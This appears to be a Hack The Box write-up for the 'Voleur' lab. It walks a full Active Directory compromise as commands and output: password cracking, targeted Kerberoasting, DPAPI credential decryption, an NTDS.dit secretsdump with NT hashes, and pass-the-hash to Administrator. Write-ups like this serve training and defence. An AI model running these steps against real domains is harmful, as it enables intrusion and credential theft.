Voleur
quickie
User
Setup /etc/krb5.conf
for kerberos authentication with voleur.htb
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
[realms]
VOLEUR.HTB = {
kdc = 10.10.11.76
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
Set your /etc/hosts
file appropriately
10.10.11.76 DC.voleur.htb voleur.htb
We can now request for a TGT using kinit
and authenticate with kerberos
kinit ryan.naylor
ryan.naylor@VOLEUR.HTB's Password:
klist
Credentials cache: FILE:/tmp/krb5cc_1000
Principal: ryan.naylor@VOLEUR.HTB
Issued Expires Principal
Jul 7 06:27:07 2025 Jul 7 16:27:07 2025 krbtgt/VOLEUR.HTB@VOLEUR.HTB
export KRB5CCNAME=/tmp/krb5cc_1000
klist
Credentials cache: FILE:/tmp/krb5cc_1000
Principal: ryan.naylor@VOLEUR.HTB
Issued Expires Principal
Jul 7 06:27:07 2025 Jul 7 16:27:07 2025 krbtgt/VOLEUR.HTB@VOLEUR.HTB
We can enumerate shares which gives us a protected excel file that can be cracked with office2john
office2john Access_Review.xlsx > hash.txt
john --wordlist=/home/kali/Desktop/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:01 DONE (2025-07-07 03:31) 0.7352g/s 611.7p/s 611.7c/s 611.7C/s football1..legolas
Use the "--show" optio
The excel file gives us the following credentials svc_ldap
:M1XyC9pW7qT5Vn
svc_iis
: N5pXyW1VqM7CZ8
todd.wolfe
: NightT1meP1dg3on14
svc_ldap
has WriteSPN
over svc_winrm
, and since there is no ADCS in the domain, we can make use of targetedKerberoasting
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set object "svc_winrm" servicePrincipalName -v 'http/anything'
[+] svc_winrm's servicePrincipalName has been updated
netexec ldap DC.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k --kerberoasting out.txt
LDAP DC.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP DC.voleur.htb 389 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
LDAP DC.voleur.htb 389 DC [*] Skipping disabled account: krbtgt
LDAP DC.voleur.htb 389 DC [*] Total of records returned 1
LDAP DC.voleur.htb 389 DC [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 17:10:12.398769, lastLogon: 2025-07-07 03:14:39.737268
LDAP DC.voleur.htb 389 DC $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$e3a804f76a893f34385ed7418ff6bb1b$e5bae5f9ae418386b4383c5c7ba483322d4e458fe3662c426deb5b6590ece022b7a367e63a1cf06ca5171ae996549757b69dcf94f2553f3311657ccd4bbbb5d54c132edea6f1a7317cb0adf569a53a03efc76d844acc0910c37c4c69578af0e1d201c1b4718b4e53179c6b1185a8432ffa268def1f2d3919adf5677002d2b15a36e5833e7932a019c0fdc40602c815b1e0ce39b096026e2e054707980a06baa993c071e7d2fd838a8394ec7cd2e03c06d7a0c3060238564e4261dec1aa3cd266f1c646e09c4e4a1d65a31bf347b43b6a61cd1c9b8fb5de7856def4b2d68e945c19d91d54ac88e531723e46ac7617d3c8b151853652d7e3e884ff635a5b9e449f2739aaa81c741b61dcffb0ad388bc5738dd1f6ff35f6e82b8c640f11c1ff3e93eb97e42195affbcc77727d40b134f8dbeea4b2bc96dbb75586e95f4a04342a4a97bdde1dc50bb21b038274c2dab482267d2ad99d106838e5cc90666b2c31bf93e1061d6f9fed33aeccdf2a4415c4c704e7b6be0e5421fcf57962b90f8b7822efccb58a2f957317cea0953e57abf8c258e65050d0f2b2cf203531d6f5848172b1d876d3f1d0a60e940aee3f146173523869d1d3718fee6d19bc31418ebd412d8c67ae242cc5663355af140cf1f2928d443b2e1232946bda92f58af40c9cb302dd6f41ff1cf2c9e54f96defbe5cbe99b05e9db652fcc6659bed5587e25e07b8403691ab57ffc0eaf1a7513a9454ee4d4e6f64733b4de99a72f2febcc51b7b2901344fc972d91cbc43480f6294382a3f8326674fa0a58ed7908318f3dc3be7d38d70874b6dd06412b13fa42f727e6ea6bf00d7ae0c52ddb4784040ca1c3aeb557c2d54f15cf4cc0297857f2507e069951eaacf388c64cb035addf2f16ab28546e94665cbba2dc337df3667f8d3287b0d846384287429b9800d2ba244c883ae45e299cb1f9b43835ed06fd74a14eed346ceba4d0fb658fd8055b66015b356bab48521fd05e6a2b00354a8b01b45f6ea6f002e5f3099e1827e5a4136a822533efadc14a03adad41884f2e250b2d2460e2a455c870b3ae3a8808e5f3416ded37a148ae337429b1b90f9e0f225f2d69e5d077c58a2ed303520520af30a5cb89203aa0300b18707320f0b94dc7e7e784dd5b10cbd8896e32b7e645eeb9625b49e67bad042c23b96b05e03d7ba89ddf41a2e3925f10b1984f16467bd8a27b9bcbb7bc489c286e2311d48c5aebc1da8d46ce5e9382c3f20091902011f42fab6cbd7bf379a195087e041aefb252d124dec55d39805d42e15ad5af894200628f4b7c9fb32eb5351fd373c7662eed0af45712cfc0a9487ba85ac9f89540234709c2851ab8a62ba072ad648f4542a18a30e20cbac6e8957e2031460dc8c3914fd608bb0832a795a84b9bceae358b13f5d8f5f7c512a668911678efe4c7228ef056166d286a983880ef6ee125c92e4dad23d8be00ff016d34a331
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$<snip>:AFireInsidedeOzarctica980219afi
We can get user flag from svc_winrm, using kinit
to get a TGT for authentication with kerberos
kinit svc_winrm
svc_winrm@VOLEUR.HTB's Password:
evil-winrm -i DC.voleur.htb -u svc_winrm -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
Root
svc_ldap
is in the Restore Users
group, which is hinted to be able to restore deleted user Todd.wolfe
Getting a shell with svc_ldap
using sliver and runascs.exe
execute-assembly /home/kali/Desktop/HTB/Tools/precompiled-binaries/LateralMovement/RunasCs.exe svc_ldap M1XyC9pW7qT5Vn a.exe
[*] Beacon bec3c39d OLD-FASHIONED_SHADOWBOX - 10.10.11.76:64050 (DC) - windows/amd64 - Mon, 07 Jul 2025 05:27:49 +08
We can do the following to restore deleted objects
PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
Deleted : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted
Objects,DC=voleur,DC=htb
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> Enable-ADAccount -Identity "Todd.Wolfe"
Enable-ADAccount -Identity "Todd.Wolfe"
We can test with netexec
to see if we now have access to Todd.Wolfe
using the password in excel NightT1meP1dg3on14
netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14
netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k --shares
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share
We can access the IT
share again to get access to a archived home directory of Todd.Wolfe
We can extract dpapi protected data using impacket-dpapi
The masterkey is at "C:\Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88
The credential blob is at C:\Users\todd.wolfe\AppData\Roaming\Credentials\772275FAD58525253490A9B0039791D3
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
Enumerate shares once again, getting access to svc_backup
ssh key as hinted in the excel note previously. There is also WSL ssh access on Port 2222.
ssh -i id_rsa -p 2222 svc_backup@DC.voleur.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jul 6 15:05:32 PDT 2025
System load: 0.52 Processes: 15
Usage of /home: unknown Users logged in: 0
Memory usage: 60% IPv4 address for eth0: 10.10.11.76
Swap usage: 3%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Jul 6 14:38:47 2025 from 10.10.11.76
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$ ls
svc_backup@DC:~$ whoami
svc_backup
We can access the \mnt
directory and accessing the IT
share once again, we see copies of SECURITY
, SYSTEM
and NTDS.dit
root@DC:/mnt/c/IT/Third-Line Support/Backups# ls
'Active Directory' registry
root@DC:/mnt/c/IT/Third-Line Support/Backups# cd registry
root@DC:/mnt/c/IT/Third-Line Support/Backups/registry# ls
SECURITY SYSTEM
We can now dump the domain and get access via evil-winrm
impacket-secretsdump local -system SYSTEM -security SECURITY -ntds ntds.dit
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
0000 06 6A DC 3B AE F7 34 91 73 0F 6C E0 55 FE A3 FF .j.;..4.s.l.U...
0010 30 31 90 0A E7 C6 12 01 08 5A D0 1E A5 BB D2 37 01.......Z.....7
0020 61 C3 FA 0D AF C9 94 4A 01 75 53 04 46 66 0A AC a......J.uS.Ff..
0030 D8 99 1F D3 BE 53 0C CF 6E 2A 4E 74 F2 E9 F2 EB .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e377177574
Use impacket-getTGT
as we do not have the password of Administrator
impacket-getTGT voleur.htb/Administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Administrator.ccache
impacket-getTGT voleur.htb/Administrator -hashes :e656e07c56d831611b577b160b259ad2
export KRB5CCNAME=./Administrator.ccache
evil-winrm -i dc.voleur.htb -u Administrator -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Last updated